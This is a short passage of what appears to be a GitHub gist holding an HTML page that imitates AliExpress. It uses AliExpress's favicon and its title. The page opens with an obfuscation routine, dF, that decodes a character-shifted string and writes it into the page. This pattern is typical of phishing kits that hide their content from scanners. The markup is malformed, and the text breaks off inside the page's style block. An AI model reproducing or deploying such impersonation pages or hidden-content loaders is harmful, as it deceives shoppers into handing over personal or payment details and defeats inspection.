Skip to content

Instantly share code, notes, and snippets.

@Desktop1230
Desktop1230 / index.html
Created August 30, 2025 03:02
Untitled
<html lang="en">
<head>
<script language="javascript">
function dF(s) {
var s1 = unescape(s.substr(0, s.length - 1));
var t = '';
for (i = 0; i < s1.length; i++) t += String.fromCharCode(s1.charCodeAt(i) - s.substr(s.length - 1, 1));
document.write(unescape(t));
}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" href="https://ae01.alicdn.com/kf/S319fd8b965e247a28c70363f8c91d7c9i.ico">
<link rel="stylesheet" href="./style.css">
<title>Buy Product Online from China Wholesalers at Aliexpress.com</title>
<style>
/* Hide number input spinners for Chrome, Safari, Edge, and Opera */